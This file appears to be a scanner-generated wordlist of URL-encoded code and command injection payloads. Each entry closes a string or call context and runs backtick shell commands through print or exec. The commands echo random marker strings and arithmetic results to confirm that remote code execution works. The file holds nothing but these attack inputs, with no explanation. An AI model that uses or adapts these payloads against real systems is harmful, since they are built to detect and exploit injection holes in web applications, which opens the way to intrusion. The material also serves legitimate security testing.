+)print(`echo%20NLOFKT\necho%20$((26%2B86))\necho%20NLOFKT\necho%20NLOFKT`)%3B%2525255C%2525255CNLOFKT +)print(`echo%20PUEXZN`.`echo%20$((11%2B4))`.`echo%20PUEXZN`.`echo%20PUEXZN`)%3B//PUEXZN +)print(`echo%20IFOQRT;echo%20$((35%2B23));echo%20IFOQRT;echo%20IFOQRT`)%3B//IFOQRT +)print(`echo%20SYVAYV%0aecho%20$((36%2B49))%0aecho%20SYVAYV%0aecho%20SYVAYV`)%3B//SYVAYV +)print(`echo%20KPLWCF\necho%20$((96%2B6))\necho%20KPLWCF\necho%20KPLWCF`)%3B//KPLWCF +)print(`echo%20EHMRQP`.`echo%20$((92%2B22))`.`echo%20EHMRQP`.`echo%20EHMRQP`)%3B%23EHMRQP +)print(`echo%20ECXTUU;echo%20$((10%2B67));echo%20ECXTUU;echo%20ECXTUU`)%3B%2523ECXTUU +)print(`echo%20LXAMNA%0aecho%20$((68%2B25))%0aecho%20LXAMNA%0aecho%20LXAMNA`)%3B%252523LXAMNA +)print(`echo%20ASMFMR\necho%20$((34%2B56))\necho%20ASMFMR\necho%20ASMFMR`)%3B%25252523ASMFMR +)print(`echo%20HXXRRP`.`echo%20$((98%2B1))`.`echo%20HXXRRP`.`echo%20HXXRRP`)%3B.%22HXXRRP +)print(`echo%20SQLMHW;echo%20$((75%2B6));echo%20SQLMHW;echo%20SQLMHW`)%3B.%2522SQLMHW +)print(`echo%20DPBGWU%0aecho%20$((48%2B67))%0aecho%20DPBGWU%0aecho%20DPBGWU`)%3B.%252522DPBGWU +)print(`echo%20YKQUFP\necho%20$((94%2B91))\necho%20YKQUFP\necho%20YKQUFP`)%3B.%25252522YKQUFP +)print(`echo%20NNYPSL`.`echo%20$((56%2B33))`.`echo%20NNYPSL`.`echo%20NNYPSL`)%3B.%27NNYPSL +)print(`echo%20YIXKKR;echo%20$((83%2B25));echo%20YIXKKR;echo%20YIXKKR`)%3B.%2527YIXKKR +)print(`echo%20FGPZFR%0aecho%20$((7%2B1))%0aecho%20FGPZFR%0aecho%20FGPZFR`)%3B.%252527FGPZFR +)print(`echo%20EZVLWV\necho%20$((40%2B27))\necho%20EZVLWV\necho%20EZVLWV`)%3B.%25252527EZVLWV +)print(`echo%20GGCMZV`.`echo%20$((6%2B53))`.`echo%20GGCMZV`.`echo%20GGCMZV`)%29%7DGGCMZV +)print(`echo%20QADPCR;echo%20$((51%2B16));echo%20QADPCR;echo%20QADPCR`)%3B%2529%257DQADPCR +)print(`echo%20AFOMNK%0aecho%20$((45%2B23))%0aecho%20AFOMNK%0aecho%20AFOMNK`)%3B%252529%25257DAFOMNK +)print(`echo%20EVRVDK\necho%20$((98%2B18))\necho%20EVRVDK\necho%20EVRVDK`)%3B%25252529%2525257DEVRVDK +')print(`echo%20KYHRZA`.`echo%20$((72%2B0))`.`echo%20KYHRZA`.`echo%20KYHRZA`)%3BKYHRZA +')print(`echo%20ESWACN;echo%20$((37%2B82));echo%20ESWACN;echo%20ESWACN`)%3BESWACN +')print(`echo%20BWPFXW%0aecho%20$((76%2B34))%0aecho%20BWPFXW%0aecho%20BWPFXW`)%3BBWPFXW +')print(`echo%20EXVUXJ\necho%20$((73%2B54))\necho%20EXVUXJ\necho%20EXVUXJ`)%3BEXVUXJ +')print(`echo%20SATCYU`.`echo%20$((51%2B26))`.`echo%20SATCYU`.`echo%20SATCYU`)%3B%5C%5CSATCYU +')print(`echo%20BONGAS;echo%20$((69%2B7));echo%20BONGAS;echo%20BONGAS`)%3B%255C%255CBONGAS +')print(`echo%20VPYMWX%0aecho%20$((10%2B22))%0aecho%20VPYMWX%0aecho%20VPYMWX`)%3B%25255C%25255CVPYMWX +')print(`echo%20OXDDYE\necho%20$((75%2B92))\necho%20OXDDYE\necho%20OXDDYE`)%3B%2525255C%2525255COXDDYE +')print(`echo%20NFASEM`.`echo%20$((28%2B31))`.`echo%20NFASEM`.`echo%20NFASEM`)%3B//NFASEM +')print(`echo%20FCMKMZ;echo%20$((68%2B75));echo%20FCMKMZ;echo%20FCMKMZ`)%3B//FCMKMZ +')print(`echo%20DWTUTD%0aecho%20$((10%2B15))%0aecho%20DWTUTD%0aecho%20DWTUTD`)%3B//DWTUTD +')print(`echo%20EHPKWP\necho%20$((79%2B86))\necho%20EHPKWP\necho%20EHPKWP`)%3B//EHPKWP +')print(`echo%20PWUTCR`.`echo%20$((0%2B3))`.`echo%20PWUTCR`.`echo%20PWUTCR`)%3B%23PWUTCR +')print(`echo%20OFKEZB;echo%20$((35%2B78));echo%20OFKEZB;echo%20OFKEZB`)%3B%2523OFKEZB +')print(`echo%20WUCPEY%0aecho%20$((63%2B16))%0aecho%20WUCPEY%0aecho%20WUCPEY`)%3B%252523WUCPEY +')print(`echo%20MAOJQM\necho%20$((57%2B39))\necho%20MAOJQM\necho%20MAOJQM`)%3B%25252523MAOJQM +')print(`echo%20VRYZVO`.`echo%20$((19%2B54))`.`echo%20VRYZVO`.`echo%20VRYZVO`)%3B.%22VRYZVO +')print(`echo%20EVXXCT;echo%20$((87%2B15));echo%20EVXXCT;echo%20EVXXCT`)%3B.%2522EVXXCT +')print(`echo%20JUEAPR%0aecho%20$((30%2B6))%0aecho%20JUEAPR%0aecho%20JUEAPR`)%3B.%252522JUEAPR +')print(`echo%20XQTSKO\necho%20$((61%2B71))\necho%20XQTSKO\necho%20XQTSKO`)%3B.%25252522XQTSKO +')print(`echo%20TYAJKR`.`echo%20$((73%2B69))`.`echo%20TYAJKR`.`echo%20TYAJKR`)%3B.%27TYAJKR +')print(`echo%20EHVUCK;echo%20$((3%2B47));echo%20EHVUCK;echo%20EHVUCK`)%3B.%2527EHVUCK +')print(`echo%20PMUZEH%0aecho%20$((73%2B89))%0aecho%20PMUZEH%0aecho%20PMUZEH`)%3B.%252527PMUZEH +')print(`echo%20QTJEKD\necho%20$((90%2B98))\necho%20QTJEKD\necho%20QTJEKD`)%3B.%25252527QTJEKD +')print(`echo%20RUXOHA`.`echo%20$((74%2B92))`.`echo%20RUXOHA`.`echo%20RUXOHA`)%29%7DRUXOHA +')print(`echo%20VEMMAU;echo%20$((59%2B39));echo%20VEMMAU;echo%20VEMMAU`)%3B%2529%257DVEMMAU +')print(`echo%20AGBHMS%0aecho%20$((79%2B32))%0aecho%20AGBHMS%0aecho%20AGBHMS`)%3B%252529%25257DAGBHMS +')print(`echo%20VHLBFA\necho%20$((78%2B60))\necho%20VHLBFA\necho%20VHLBFA`)%3B%25252529%2525257DVHLBFA +")print(`echo%20COMPTT`.`echo%20$((78%2B29))`.`echo%20COMPTT`.`echo%20COMPTT`)%3BCOMPTT +")print(`echo%20OTTCBX;echo%20$((64%2B75));echo%20OTTCBX;echo%20OTTCBX`)%3BOTTCBX +")print(`echo%20PPZHBZ%0aecho%20$((86%2B40))%0aecho%20PPZHBZ%0aecho%20PPZHBZ`)%3BPPZHBZ +")print(`echo%20PHKGWS\necho%20$((9%2B71))\necho%20PHKGWS\necho%20PHKGWS`)%3BPHKGWS +")print(`echo%20MOHYBU`.`echo%20$((61%2B5))`.`echo%20MOHYBU`.`echo%20MOHYBU`)%3B%5C%5CMOHYBU +")print(`echo%20ATRPAE;echo%20$((77%2B72));echo%20ATRPAE;echo%20ATRPAE`)%3B%255C%255CATRPAE +")print(`echo%20GHHJFR%0aecho%20$((52%2B63))%0aecho%20GHHJFR%0aecho%20GHHJFR`)%3B%25255C%25255CGHHJFR +")print(`echo%20NBPPTV\necho%20$((1%2B63))\necho%20NBPPTV\necho%20NBPPTV`)%3B%2525255C%2525255CNBPPTV +")print(`echo%20OZMQFI`.`echo%20$((35%2B9))`.`echo%20OZMQFI`.`echo%20OZMQFI`)%3B//OZMQFI +")print(`echo%20HXHMHH;echo%20$((40%2B31));echo%20HXHMHH;echo%20HXHMHH`)%3B//HXHMHH +")print(`echo%20OVQSQG%0aecho%20$((8%2B36))%0aecho%20OVQSQG%0aecho%20OVQSQG`)%3B//OVQSQG +")print(`echo%20ULOIOS\necho%20$((51%2B30))\necho%20ULOIOS\necho%20ULOIOS`)%3B//ULOIOS +")print(`echo%20CHKGSS`.`echo%20$((80%2B0))`.`echo%20CHKGSS`.`echo%20CHKGSS`)%3B%23CHKGSS +")print(`echo%20KZZFJE;echo%20$((74%2B13));echo%20KZZFJE;echo%20KZZFJE`)%3B%2523KZZFJE +")print(`echo%20RPOOHR%0aecho%20$((72%2B27))%0aecho%20RPOOHR%0aecho%20RPOOHR`)%3B%252523RPOOHR +")print(`echo%20UKYEKY\necho%20$((70%2B74))\necho%20UKYEKY\necho%20UKYEKY`)%3B%25252523UKYEKY +")print(`echo%20SGRKCG`.`echo%20$((91%2B4))`.`echo%20SGRKCG`.`echo%20SGRKCG`)%3B.%22SGRKCG +")print(`echo%20SPKTID;echo%20$((50%2B54));echo%20SPKTID;echo%20SPKTID`)%3B.%2522SPKTID +")print(`echo%20XCIHWH%0aecho%20$((57%2B90))%0aecho%20XCIHWH%0aecho%20XCIHWH`)%3B.%252522XCIHWH +")print(`echo%20JNKGOO\necho%20$((17%2B90))\necho%20JNKGOO\necho%20JNKGOO`)%3B.%25252522JNKGOO +")print(`echo%20QZFGHE`.`echo%20$((4%2B60))`.`echo%20QZFGHE`.`echo%20QZFGHE`)%3B.%27QZFGHE +")print(`echo%20CAQHUJ;echo%20$((70%2B24));echo%20CAQHUJ;echo%20CAQHUJ`)%3B.%2527CAQHUJ +")print(`echo%20ADFEOJ%0aecho%20$((67%2B57))%0aecho%20ADFEOJ%0aecho%20ADFEOJ`)%3B.%252527ADFEOJ +")print(`echo%20GIKPYM\necho%20$((77%2B22))\necho%20GIKPYM\necho%20GIKPYM`)%3B.%25252527GIKPYM +")print(`echo%20SPTGKB`.`echo%20$((57%2B66))`.`echo%20SPTGKB`.`echo%20SPTGKB`)%29%7DSPTGKB +")print(`echo%20COYGWQ;echo%20$((40%2B21));echo%20COYGWQ;echo%20COYGWQ`)%3B%2529%257DCOYGWQ +")print(`echo%20MMOCRN%0aecho%20$((88%2B99))%0aecho%20MMOCRN%0aecho%20MMOCRN`)%3B%252529%25257DMMOCRN +")print(`echo%20BUJJSS\necho%20$((4%2B1))\necho%20BUJJSS\necho%20BUJJSS`)%3B%25252529%2525257DBUJJSS +".print(`echo%20COYIQB`.`echo%20$((70%2B26))`.`echo%20COYIQB`.`echo%20COYIQB`)%3BCOYIQB +".print(`echo%20UCUISA;echo%20$((65%2B31));echo%20UCUISA;echo%20UCUISA`)%3BUCUISA +".print(`echo%20AGODDO%0aecho%20$((7%2B33))%0aecho%20AGODDO%0aecho%20AGODDO`)%3BAGODDO +".print(`echo%20IFQMUW\necho%20$((62%2B32))\necho%20IFQMUW\necho%20IFQMUW`)%3BIFQMUW +".print(`echo%20RZWFMA`.`echo%20$((75%2B86))`.`echo%20RZWFMA`.`echo%20RZWFMA`)%3B%5C%5CRZWFMA +".print(`echo%20RVELEJ;echo%20$((74%2B30));echo%20RVELEJ;echo%20RVELEJ`)%3B%255C%255CRVELEJ +".print(`echo%20ACGJLG%0aecho%20$((54%2B11))%0aecho%20ACGJLG%0aecho%20ACGJLG`)%3B%25255C%25255CACGJLG +".print(`echo%20PZAGMU\necho%20$((23%2B82))\necho%20PZAGMU\necho%20PZAGMU`)%3B%2525255C%2525255CPZAGMU +".print(`echo%20XBJBDE`.`echo%20$((48%2B93))`.`echo%20XBJBDE`.`echo%20XBJBDE`)%3B//XBJBDE +".print(`echo%20EYOYIJ;echo%20$((34%2B58));echo%20EYOYIJ;echo%20EYOYIJ`)%3B//EYOYIJ +".print(`echo%20WKFYWT%0aecho%20$((57%2B28))%0aecho%20WKFYWT%0aecho%20WKFYWT`)%3B//WKFYWT +".print(`echo%20MKBEZC\necho%20$((61%2B47))\necho%20MKBEZC\necho%20MKBEZC`)%3B//MKBEZC +".print(`echo%20POVQEX`.`echo%20$((96%2B65))`.`echo%20POVQEX`.`echo%20POVQEX`)%3B%23POVQEX +".print(`echo%20MFYSPW;echo%20$((87%2B75));echo%20MFYSPW;echo%20MFYSPW`)%3B%2523MFYSPW +".print(`echo%20DSHOEV%0aecho%20$((44%2B47))%0aecho%20DSHOEV%0aecho%20DSHOEV`)%3B%252523DSHOEV +".print(`echo%20ULLCKQ\necho%20$((63%2B14))\necho%20ULLCKQ\necho%20ULLCKQ`)%3B%25252523ULLCKQ +".print(`echo%20DFRGXJ`.`echo%20$((12%2B99))`.`echo%20DFRGXJ`.`echo%20DFRGXJ`)%3B.%22DFRGXJ +".print(`echo%20EKDSZM;echo%20$((50%2B62));echo%20EKDSZM;echo%20EKDSZM`)%3B.%2522EKDSZM +".print(`echo%20ZTFYUM%0aecho%20$((56%2B81))%0aecho%20ZTFYUM%0aecho%20ZTFYUM`)%3B.%252522ZTFYUM +".print(`echo%20CEZYFB\necho%20$((70%2B98))\necho%20CEZYFB\necho%20CEZYFB`)%3B.%25252522CEZYFB +".print(`echo%20HAMONB`.`echo%20$((26%2B57))`.`echo%20HAMONB`.`echo%20HAMONB`)%3B.%27HAMONB +".print(`echo%20VFIBZQ;echo%20$((31%2B85));echo%20VFIBZQ;echo%20VFIBZQ`)%3B.%2527VFIBZQ +".print(`echo%20XKLFAP%0aecho%20$((76%2B43))%0aecho%20XKLFAP%0aecho%20XKLFAP`)%3B.%252527XKLFAP +".print(`echo%20DBTAFQ\necho%20$((79%2B27))\necho%20DBTAFQ\necho%20DBTAFQ`)%3B.%25252527DBTAFQ +".print(`echo%20ZLVKDU`.`echo%20$((0%2B22))`.`echo%20ZLVKDU`.`echo%20ZLVKDU`)%29%7DZLVKDU +".print(`echo%20HGIQEK;echo%20$((64%2B67));echo%20HGIQEK;echo%20HGIQEK`)%3B%2529%257DHGIQEK +".print(`echo%20UFRBLO%0aecho%20$((1%2B17))%0aecho%20UFRBLO%0aecho%20UFRBLO`)%3B%252529%25257DUFRBLO +".print(`echo%20MGGIBH\necho%20$((69%2B4))\necho%20MGGIBH\necho%20MGGIBH`)%3B%25252529%2525257DMGGIBH +'.print(`echo%20IQVVVA`.`echo%20$((38%2B34))`.`echo%20IQVVVA`.`echo%20IQVVVA`)%3BIQVVVA +'.print(`echo%20KHHFWC;echo%20$((15%2B27));echo%20KHHFWC;echo%20KHHFWC`)%3BKHHFWC +'.print(`echo%20NXDUHQ%0aecho%20$((28%2B78))%0aecho%20NXDUHQ%0aecho%20NXDUHQ`)%3BNXDUHQ +'.print(`echo%20XYCPFN\necho%20$((60%2B62))\necho%20XYCPFN\necho%20XYCPFN`)%3BXYCPFN +'.print(`echo%20KKDSRH`.`echo%20$((88%2B16))`.`echo%20KKDSRH`.`echo%20KKDSRH`)%3B%5C%5CKKDSRH +'.print(`echo%20QLKXYP;echo%20$((79%2B46));echo%20QLKXYP;echo%20QLKXYP`)%3B%255C%255CQLKXYP +'.print(`echo%20EVZCEK%0aecho%20$((38%2B37))%0aecho%20EVZCEK%0aecho%20EVZCEK`)%3B%25255C%25255CEVZCEK +'.print(`echo%20VXYNWW\necho%20$((29%2B16))\necho%20VXYNWW\necho%20VXYNWW`)%3B%2525255C%2525255CVXYNWW +'.print(`echo%20KVAVOQ`.`echo%20$((63%2B81))`.`echo%20KVAVOQ`.`echo%20KVAVOQ`)%3B//KVAVOQ +'.print(`echo%20GDFQZF;echo%20$((65%2B2));echo%20GDFQZF;echo%20GDFQZF`)%3B//GDFQZF +'.print(`echo%20SMJBZB%0aecho%20$((19%2B71))%0aecho%20SMJBZB%0aecho%20SMJBZB`)%3B//SMJBZB +'.print(`echo%20CXYKAU\necho%20$((56%2B15))\necho%20CXYKAU\necho%20CXYKAU`)%3B//CXYKAU +'.print(`echo%20VWGDMS`.`echo%20$((77%2B11))`.`echo%20VWGDMS`.`echo%20VWGDMS`)%3B%23VWGDMS +'.print(`echo%20DWVXEQ;echo%20$((13%2B19));echo%20DWVXEQ;echo%20DWVXEQ`)%3B%2523DWVXEQ +'.print(`echo%20YBQGFX%0aecho%20$((90%2B18))%0aecho%20YBQGFX%0aecho%20YBQGFX`)%3B%252523YBQGFX +'.print(`echo%20IYCMIH\necho%20$((35%2B93))\necho%20IYCMIH\necho%20IYCMIH`)%3B%25252523IYCMIH +'.print(`echo%20ULZFRM`.`echo%20$((96%2B62))`.`echo%20ULZFRM`.`echo%20ULZFRM`)%3B.%22ULZFRM +'.print(`echo%20MFFGYS;echo%20$((68%2B25));echo%20MFFGYS;echo%20MFFGYS`)%3B.%2522MFFGYS +'.print(`echo%20HBLPLA%0aecho%20$((39%2B88))%0aecho%20HBLPLA%0aecho%20HBLPLA`)%3B.%252522HBLPLA +'.print(`echo%20JLXMKL\necho%20$((67%2B26))\necho%20JLXMKL\necho%20JLXMKL`)%3B.%25252522JLXMKL +'.print(`echo%20RDHTSN`.`echo%20$((90%2B44))`.`echo%20RDHTSN`.`echo%20RDHTSN`)%3B.%27RDHTSN +'.print(`echo%20WMQCVY;echo%20$((96%2B95));echo%20WMQCVY;echo%20WMQCVY`)%3B.%2527WMQCVY +'.print(`echo%20MFBKHT%0aecho%20$((27%2B47))%0aecho%20MFBKHT%0aecho%20MFBKHT`)%3B.%252527MFBKHT +'.print(`echo%20IINFPE\necho%20$((95%2B84))\necho%20IINFPE\necho%20IINFPE`)%3B.%25252527IINFPE +'.print(`echo%20HLTCMZ`.`echo%20$((55%2B5))`.`echo%20HLTCMZ`.`echo%20HLTCMZ`)%29%7DHLTCMZ +'.print(`echo%20TSTIED;echo%20$((94%2B6));echo%20TSTIED;echo%20TSTIED`)%3B%2529%257DTSTIED +'.print(`echo%20PFJGQM%0aecho%20$((86%2B33))%0aecho%20PFJGQM%0aecho%20PFJGQM`)%3B%252529%25257DPFJGQM +'.print(`echo%20KFTIEO\necho%20$((9%2B66))\necho%20KFTIEO\necho%20KFTIEO`)%3B%25252529%2525257DKFTIEO +);}print(`echo%20WZOXHV`.`echo%20$((36%2B81))`.`echo%20WZOXHV`.`echo%20WZOXHV`)%3BWZOXHV +);}print(`echo%20UTBTBN;echo%20$((92%2B40));echo%20UTBTBN;echo%20UTBTBN`)%3BUTBTBN +);}print(`echo%20KAJDYV%0aecho%20$((71%2B88))%0aecho%20KAJDYV%0aecho%20KAJDYV`)%3BKAJDYV +);}print(`echo%20PJRPBN\necho%20$((21%2B16))\necho%20PJRPBN\necho%20PJRPBN`)%3BPJRPBN +);}print(`echo%20KRAWWO`.`echo%20$((15%2B36))`.`echo%20KRAWWO`.`echo%20KRAWWO`)%3B%5C%5CKRAWWO +);}print(`echo%20JRCPDX;echo%20$((59%2B49));echo%20JRCPDX;echo%20JRCPDX`)%3B%255C%255CJRCPDX +);}print(`echo%20XMVWXQ%0aecho%20$((48%2B88))%0aecho%20XMVWXQ%0aecho%20XMVWXQ`)%3B%25255C%25255CXMVWXQ +);}print(`echo%20SWQEIO\necho%20$((64%2B42))\necho%20SWQEIO\necho%20SWQEIO`)%3B%2525255C%2525255CSWQEIO +);}print(`echo%20MUNABZ`.`echo%20$((46%2B73))`.`echo%20MUNABZ`.`echo%20MUNABZ`)%3B//MUNABZ +);}print(`echo%20BAPQUZ;echo%20$((9%2B46));echo%20BAPQUZ;echo%20BAPQUZ`)%3B//BAPQUZ +);}print(`echo%20WVNNUB%0aecho%20$((6%2B67))%0aecho%20WVNNUB%0aecho%20WVNNUB`)%3B//WVNNUB +);}print(`echo%20KDYDKK\necho%20$((47%2B87))\necho%20KDYDKK\necho%20KDYDKK`)%3B//KDYDKK +);}print(`echo%20MRPUDM`.`echo%20$((50%2B14))`.`echo%20MRPUDM`.`echo%20MRPUDM`)%3B%23MRPUDM +);}print(`echo%20BJFECX;echo%20$((21%2B86));echo%20BJFECX;echo%20BJFECX`)%3B%2523BJFECX +);}print(`echo%20JRFJOE%0aecho%20$((92%2B73))%0aecho%20JRFJOE%0aecho%20JRFJOE`)%3B%252523JRFJOE +);}print(`echo%20ZXKKBW\necho%20$((18%2B93))\necho%20ZXKKBW\necho%20ZXKKBW`)%3B%25252523ZXKKBW +);}print(`echo%20DETLEF`.`echo%20$((0%2B62))`.`echo%20DETLEF`.`echo%20DETLEF`)%3B.%22DETLEF +);}print(`echo%20MSEKQO;echo%20$((87%2B12));echo%20MSEKQO;echo%20MSEKQO`)%3B.%2522MSEKQO +);}print(`echo%20HXJYZZ%0aecho%20$((70%2B79))%0aecho%20HXJYZZ%0aecho%20HXJYZZ`)%3B.%252522HXJYZZ +);}print(`echo%20DSHIRJ\necho%20$((54%2B41))\necho%20DSHIRJ\necho%20DSHIRJ`)%3B.%25252522DSHIRJ +);}print(`echo%20KXLAQH`.`echo%20$((80%2B88))`.`echo%20KXLAQH`.`echo%20KXLAQH`)%3B.%27KXLAQH +);}print(`echo%20BCMROJ;echo%20$((2%2B69));echo%20BCMROJ;echo%20BCMROJ`)%3B.%2527BCMROJ +);}print(`echo%20OSKSTF%0aecho%20$((2%2B12))%0aecho%20OSKSTF%0aecho%20OSKSTF`)%3B.%252527OSKSTF +);}print(`echo%20KBRMCR\necho%20$((41%2B94))\necho%20KBRMCR\necho%20KBRMCR`)%3B.%25252527KBRMCR +);}print(`echo%20KYGLOF`.`echo%20$((80%2B87))`.`echo%20KYGLOF`.`echo%20KYGLOF`)%29%7DKYGLOF +);}print(`echo%20JIIHYT;echo%20$((7%2B65));echo%20JIIHYT;echo%20JIIHYT`)%3B%2529%257DJIIHYT +);}print(`echo%20SCGPHN%0aecho%20$((41%2B99))%0aecho%20SCGPHN%0aecho%20SCGPHN`)%3B%252529%25257DSCGPHN +);}print(`echo%20KAYVRD\necho%20$((4%2B54))\necho%20KAYVRD\necho%20KAYVRD`)%3B%25252529%2525257DKAYVRD +');}print(`echo%20YERJDV`.`echo%20$((3%2B37))`.`echo%20YERJDV`.`echo%20YERJDV`)%3BYERJDV +');}print(`echo%20RNSTSU;echo%20$((52%2B2));echo%20RNSTSU;echo%20RNSTSU`)%3BRNSTSU +');}print(`echo%20EKPEWV%0aecho%20$((50%2B69))%0aecho%20EKPEWV%0aecho%20EKPEWV`)%3BEKPEWV +');}print(`echo%20BHUVJI\necho%20$((10%2B13))\necho%20BHUVJI\necho%20BHUVJI`)%3BBHUVJI +');}print(`echo%20TBZBGJ`.`echo%20$((58%2B75))`.`echo%20TBZBGJ`.`echo%20TBZBGJ`)%3B%5C%5CTBZBGJ +');}print(`echo%20NPFNRM;echo%20$((91%2B52));echo%20NPFNRM;echo%20NPFNRM`)%3B%255C%255CNPFNRM +');}print(`echo%20HDWSHN%0aecho%20$((40%2B78))%0aecho%20HDWSHN%0aecho%20HDWSHN`)%3B%25255C%25255CHDWSHN +');}print(`echo%20FOGQPM\necho%20$((27%2B12))\necho%20FOGQPM\necho%20FOGQPM`)%3B%2525255C%2525255CFOGQPM +');}print(`echo%20XREPUI`.`echo%20$((55%2B99))`.`echo%20XREPUI`.`echo%20XREPUI`)%3B//XREPUI +');}print(`echo%20GVZZMK;echo%20$((1%2B62));echo%20GVZZMK;echo%20GVZZMK`)%3B//GVZZMK +');}print(`echo%20VBLUSZ%0aecho%20$((96%2B95))%0aecho%20VBLUSZ%0aecho%20VBLUSZ`)%3B//VBLUSZ +');}print(`echo%20EVHTLK\necho%20$((99%2B40))\necho%20EVHTLK\necho%20EVHTLK`)%3B//EVHTLK +');}print(`echo%20URYEKO`.`echo%20$((45%2B57))`.`echo%20URYEKO`.`echo%20URYEKO`)%3B%23URYEKO +');}print(`echo%20BQJSKG;echo%20$((72%2B76));echo%20BQJSKG;echo%20BQJSKG`)%3B%2523BQJSKG +');}print(`echo%20IMZVGR%0aecho%20$((80%2B38))%0aecho%20IMZVGR%0aecho%20IMZVGR`)%3B%252523IMZVGR +');}print(`echo%20MMQDEE\necho%20$((77%2B28))\necho%20MMQDEE\necho%20MMQDEE`)%3B%25252523MMQDEE +');}print(`echo%20HDQYRP`.`echo%20$((43%2B86))`.`echo%20HDQYRP`.`echo%20HDQYRP`)%3B.%22HDQYRP +');}print(`echo%20JDHUOY;echo%20$((0%2B32));echo%20JDHUOY;echo%20JDHUOY`)%3B.%2522JDHUOY +');}print(`echo%20GKLRKU%0aecho%20$((97%2B77))%0aecho%20GKLRKU%0aecho%20GKLRKU`)%3B.%252522GKLRKU +');}print(`echo%20UXXDJD\necho%20$((17%2B17))\necho%20UXXDJD\necho%20UXXDJD`)%3B.%25252522UXXDJD +');}print(`echo%20HEGGJN`.`echo%20$((68%2B69))`.`echo%20HEGGJN`.`echo%20HEGGJN`)%3B.%27HEGGJN +');}print(`echo%20YXZEEF;echo%20$((79%2B80));echo%20YXZEEF;echo%20YXZEEF`)%3B.%2527YXZEEF +');}print(`echo%20TJELNR%0aecho%20$((81%2B0))%0aecho%20TJELNR%0aecho%20TJELNR`)%3B.%252527TJELNR +');}print(`echo%20IFVTUZ\necho%20$((51%2B31))\necho%20IFVTUZ\necho%20IFVTUZ`)%3B.%25252527IFVTUZ +');}print(`echo%20SVXVYZ`.`echo%20$((35%2B1))`.`echo%20SVXVYZ`.`echo%20SVXVYZ`)%29%7DSVXVYZ +');}print(`echo%20TFOYWK;echo%20$((13%2B51));echo%20TFOYWK;echo%20TFOYWK`)%3B%2529%257DTFOYWK +');}print(`echo%20IXTNVY%0aecho%20$((8%2B16))%0aecho%20IXTNVY%0aecho%20IXTNVY`)%3B%252529%25257DIXTNVY +');}print(`echo%20DEXNOX\necho%20$((69%2B36))\necho%20DEXNOX\necho%20DEXNOX`)%3B%25252529%2525257DDEXNOX +");}print(`echo%20NAAXBX`.`echo%20$((38%2B13))`.`echo%20NAAXBX`.`echo%20NAAXBX`)%3BNAAXBX +");}print(`echo%20TWEYRU;echo%20$((57%2B60));echo%20TWEYRU;echo%20TWEYRU`)%3BTWEYRU +");}print(`echo%20WCABAY%0aecho%20$((46%2B3))%0aecho%20WCABAY%0aecho%20WCABAY`)%3BWCABAY +");}print(`echo%20XYXNLP\necho%20$((64%2B13))\necho%20XYXNLP\necho%20XYXNLP`)%3BXYXNLP +");}print(`echo%20QHWLWM`.`echo%20$((41%2B28))`.`echo%20QHWLWM`.`echo%20QHWLWM`)%3B%5C%5CQHWLWM +");}print(`echo%20WQBRFD;echo%20$((85%2B53));echo%20WQBRFD;echo%20WQBRFD`)%3B%255C%255CWQBRFD +");}print(`echo%20HWAGVJ%0aecho%20$((14%2B22))%0aecho%20HWAGVJ%0aecho%20HWAGVJ`)%3B%25255C%25255CHWAGVJ +");}print(`echo%20XILSBL\necho%20$((74%2B71))\necho%20XILSBL\necho%20XILSBL`)%3B%2525255C%2525255CXILSBL +");}print(`echo%20KHRTRY`.`echo%20$((68%2B68))`.`echo%20KHRTRY`.`echo%20KHRTRY`)%3B//KHRTRY +");}print(`echo%20YDWEZS;echo%20$((87%2B70));echo%20YDWEZS;echo%20YDWEZS`)%3B//YDWEZS +");}print(`echo%20JFBZLZ%0aecho%20$((64%2B83))%0aecho%20JFBZLZ%0aecho%20JFBZLZ`)%3B//JFBZLZ +");}print(`echo%20UTFROF\necho%20$((67%2B6))\necho%20UTFROF\necho%20UTFROF`)%3B//UTFROF +");}print(`echo%20RACXOI`.`echo%20$((81%2B11))`.`echo%20RACXOI`.`echo%20RACXOI`)%3B%23RACXOI +");}print(`echo%20DKLYZK;echo%20$((5%2B95));echo%20DKLYZK;echo%20DKLYZK`)%3B%2523DKLYZK +");}print(`echo%20YSGCAB%0aecho%20$((76%2B3))%0aecho%20YSGCAB%0aecho%20YSGCAB`)%3B%252523YSGCAB +");}print(`echo%20CKSIUK\necho%20$((45%2B4))\necho%20CKSIUK\necho%20CKSIUK`)%3B%25252523CKSIUK +");}print(`echo%20LVFGXD`.`echo%20$((25%2B23))`.`echo%20LVFGXD`.`echo%20LVFGXD`)%3B.%22LVFGXD +");}print(`echo%20IBFQKH;echo%20$((32%2B31));echo%20IBFQKH;echo%20IBFQKH`)%3B.%2522IBFQKH +");}print(`echo%20MPXDZZ%0aecho%20$((78%2B91))%0aecho%20MPXDZZ%0aecho%20MPXDZZ`)%3B.%252522MPXDZZ +");}print(`echo%20GHISCR\necho%20$((96%2B53))\necho%20GHISCR\necho%20GHISCR`)%3B.%25252522GHISCR +");}print(`echo%20UHQKLI`.`echo%20$((50%2B4))`.`echo%20UHQKLI`.`echo%20UHQKLI`)%3B.%27UHQKLI +");}print(`echo%20MDITEG;echo%20$((51%2B68));echo%20MDITEG;echo%20MDITEG`)%3B.%2527MDITEG +");}print(`echo%20RKXNWH%0aecho%20$((63%2B75))%0aecho%20RKXNWH%0aecho%20RKXNWH`)%3B.%252527RKXNWH +");}print(`echo%20RXUKTF\necho%20$((42%2B2))\necho%20RXUKTF\necho%20RXUKTF`)%3B.%25252527RXUKTF +");}print(`echo%20TCCEGQ`.`echo%20$((87%2B34))`.`echo%20TCCEGQ`.`echo%20TCCEGQ`)%29%7DTCCEGQ +");}print(`echo%20NUVVKA;echo%20$((27%2B5));echo%20NUVVKA;echo%20NUVVKA`)%3B%2529%257DNUVVKA +");}print(`echo%20QNFOEE%0aecho%20$((91%2B41))%0aecho%20QNFOEE%0aecho%20QNFOEE`)%3B%252529%25257DQNFOEE +");}print(`echo%20SFBDLE\necho%20$((73%2B49))\necho%20SFBDLE\necho%20SFBDLE`)%3B%25252529%2525257DSFBDLE +${exec(print(`echo%20HIUMZJ`.`echo%20$((69%2B37))`.`echo%20HIUMZJ`.`echo%20HIUMZJ`)%3BHIUMZJ +${exec(print(`echo%20BDBPSZ;echo%20$((87%2B50));echo%20BDBPSZ;echo%20BDBPSZ`)%3BBDBPSZ +${exec(print(`echo%20UVBBNB%0aecho%20$((5%2B32))%0aecho%20UVBBNB%0aecho%20UVBBNB`)%3BUVBBNB 